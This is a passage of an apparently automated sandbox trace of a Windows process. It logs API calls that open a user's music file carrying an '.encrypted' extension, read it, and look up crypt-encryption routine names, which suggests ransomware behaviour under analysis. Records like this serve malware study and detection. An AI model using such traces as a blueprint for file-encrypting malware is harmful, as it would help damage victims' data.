HALPmcxz\\Music\\vW-6Csrf0kc.encrypted.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vw-6csrf0kc.encrypted.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0038.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0038.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0038.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0038.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.548] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0038.548] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0038.548] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0038.548] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0038.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0038.549] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0038.549] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0038.551] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x719c, lpOverlapped=0x0) returned 1 [0038.552] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0038.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0038.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1719c) returned 0xac0018 [0038.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0038.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0038.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1719c) returned 0x935008 [0038.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.555] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0038.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1719c) returned 0xac0018 [0038.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0038.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.555] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0038.556] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0038.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.556] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0038.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0038.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0038.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0038.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0038.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1719c) returned 0xac0018 [0038.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0038.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0038.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0038.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0038.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0038.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0038.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0038.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0038.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc10 [0038.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0038.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0038.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0038.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0038.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1719c) returned 0x94c1b0 [0038.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0038.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0038.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0038.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0038.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0038.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0038.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0038.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0038.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0038.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0038.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0038.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.558] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0038.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0038.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0038.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0038.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0038.558] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0038.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0038.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0038.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0038.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.559] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0038.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2d8 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc28 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0038.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.559] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0038.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0038.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0038.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0038.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0038.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0038.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0038.560] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0038.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0038.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0038.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0038.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0038.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0038.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0038.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0038.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0038.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0038.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0038.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0038.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0038.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0038.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0038.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.561] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0038.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0038.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0038.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0038.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0038.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0038.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0038.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0038.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0038.561] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0038.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0038.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0038.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0038.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0038.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.562] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", 